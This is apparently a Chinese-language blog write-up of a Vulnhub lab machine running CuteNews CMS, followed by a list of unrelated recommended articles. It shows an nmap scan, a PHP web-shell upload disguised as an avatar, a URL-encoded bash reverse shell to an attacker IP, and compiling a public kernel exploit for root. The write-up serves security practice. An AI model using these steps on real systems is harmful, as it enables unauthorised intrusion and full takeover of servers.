[Vulnhub] Simple CuteNews-CMS+Kernel权限提升

Мартин.2024-07-14 21:42

信息收集

IP Address Opening Ports
192.168.8.104 TCP:80

$ nmap -p- 192.168.8.104 --min-rate 1000 -sC -sV

bash 复制代码 
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)

本地权限

注册用户登录

Content-Disposition: form-data; name="avatar_file"; filename="reverse.php"

http://192.168.8.104/uploads/avatar_admin2_reverse.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.8.107%2F10032%200%3E%261%27

权限提升

$ cat /etc/os-release

https://www.exploit-db.com/exploits/36746

$ gcc 36746.c -static -o 36746

# ./36746

相关推荐
世界尽头与你17 分钟前
企业内网安全
网络·安全·内网安全
域智盾系统1 小时前
电脑文件防泄密软件哪个好?这六款软件建议收藏【精选推荐】
网络
谭舜心2 小时前
怎么让Nginx可以访问某一IP的每个后台controller接口
网络·tcp/ip·nginx
Savannah.security2 小时前
Linux基础---07文件传输及解决yum安装失效的方法
linux·网络·php
正经人_____3 小时前
6、等级保护政策内容
网络
网安laughing哥3 小时前
2024年三个月自学 网络安全(黑客技术)手册
网络·安全·web安全
就是现在3 小时前
网络信息传输安全
网络·安全
SG.xf4 小时前
ftp服务的管理及安全优化
linux·服务器·网络
小麦黑客笔记5 小时前
2024年三个月自学手册 网络安全(黑客技术)
开发语言·网络·安全·web安全·网络安全
JC036 小时前
SIP信令的基本流程
网络·信息与通信·信号处理
热门推荐
01CCF-CSP认证考试 202406-3 文本分词 100分题解02RAG 实践- Ollama+RagFlow 部署本地知识库032024年高教社杯数学建模国赛C题超详细解题思路分析04实战 | 基于YOLOv9和OpenCV实现车辆跟踪计数(步骤 + 源码)05组基轨迹建模 GBTM的介绍与实现(Stata 或 R)06【2024数模国赛赛题思路公开】国赛B题思路丨附可运行代码丨无偿自提07【数据分享】1961—2022年全国范围的逐日降水栅格数据08苍穹外卖面试总结09【2024高教社杯全国大学生数学建模竞赛】B题 生产过程中的决策问题——解题思路 代码 论文10yolov8实战第五天——yolov8+ffmpg实时视频流检测并进行实时推流——(推流,保姆教学)